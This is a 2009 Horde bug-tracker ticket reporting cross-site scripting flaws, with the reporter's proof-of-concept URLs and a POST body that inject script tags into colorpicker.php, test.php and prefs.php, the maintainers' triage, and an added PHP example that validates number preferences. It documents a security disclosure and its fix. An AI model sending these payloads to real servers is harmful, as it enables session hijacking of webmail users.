[#8399] Number preferences are not validated properly
Summary Number preferences are not validated properly
Queue Horde Base
Queue Version HEAD
Type Bug
State Resolved
Priority 2. Medium
Owners Chuck Hagenbuch <chuck (at) horde (dot) org>
Requester security (at) davidwharton (dot) us
Created 07/03/09 (258 days ago)
Due
Updated 07/11/09 (250 days ago)
Assigned 07/11/09 (250 days ago)
Resolved 07/11/09 (250 days ago)
Attachments
Milestone 3.3.5
Patch No

History
07/11/09 Chuck Hagenbuch Comment #4
Taken from Horde Developers
State ⇒ Resolved
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
07/11/09 CVS Commit Comment #3
07/11/09 Chuck Hagenbuch Comment #2
Milestone ⇒ 3.3.5
Version ⇒ HEAD
State ⇒ Assigned
Summary ⇒ Number preferences are not validated properly
Assigned to Horde Developers
Assigned to Chuck Hagenbuch
Multiple cross site scripting vulnerabilities exist.  Proof of concepts:
Horde 3.1 has been deprecated for a long time. The current stable 
version is 3.3, and we backport serious security fixes to 3.2.
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
This file doesn't exist in 3.2 or later.
This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on



This I can actually reproduce as a problem. Patch forthcoming.
07/03/09 security (at) davidwharton (dot) us Comment #1
State ⇒ Unconfirmed
Patch ⇒
Milestone ⇒
Queue ⇒ Horde Base
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Type ⇒ Bug
Priority ⇒ 2. Medium
Multiple cross site scripting vulnerabilities exist.  Proof of concepts:



http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>



https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["



https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>



POST to http://hordeserver.com/horde/services/prefs.php with the 
following content:



actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on
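
The kind of server-side check the ticket summary calls for, as an added PHP example that is not Horde's code or the fix that was committed. The preference names come from the POST body in the report; the table of number-type preferences, the ranges and the function names are assumptions made for illustration.

```php
<?php
// Added example, not Horde code. Ranges and the set of number-type
// preferences are assumptions; only the field names come from the report.
const NUMBER_PREFS = [
    'sidebar_width'        => ['min' => 0, 'max' => 2000],
    'summary_refresh_time' => ['min' => 0, 'max' => 86400],
    'menu_refresh_time'    => ['min' => 0, 'max' => 86400],
];

/** Return the validated integer, or null if the value is not a plain in-range integer. */
function validate_number_pref(string $name, $raw): ?int
{
    if (!array_key_exists($name, NUMBER_PREFS) || !is_string($raw)) {
        return null;
    }
    // Digits only: rejects signs, whitespace, CR/LF, markup and trailing text.
    // The D modifier stops "$" from matching before a trailing newline.
    if (!preg_match('/^[0-9]{1,9}$/D', $raw)) {
        return null;
    }
    $value = (int) $raw;
    $range = NUMBER_PREFS[$name];
    return ($value >= $range['min'] && $value <= $range['max']) ? $value : null;
}

/** Apply a submitted form: store valid numbers, list the fields that were rejected. */
function update_number_prefs(array $post, array $current): array
{
    $rejected = [];
    foreach (array_keys(NUMBER_PREFS) as $name) {
        if (!array_key_exists($name, $post)) {
            continue;
        }
        $value = validate_number_pref($name, $post[$name]);
        if ($value === null) {
            $rejected[] = $name;          // the stored value stays unchanged
        } else {
            $current[$name] = $value;
        }
    }
    return [$current, $rejected];
}

// Constructed sample input: one number field carrying trailing markup, one valid.
$post = ['sidebar_width' => '1337//--><script>', 'menu_refresh_time' => '0'];
[$prefs, $rejected] = update_number_prefs($post, ['sidebar_width' => 150, 'menu_refresh_time' => 300]);
var_dump($prefs, $rejected);   // sidebar_width stays 150 and is listed as rejected
```

Validation at write time only protects values saved after it is deployed, so templates that emit a number preference should still cast it with `(int)` or encode it for the output context.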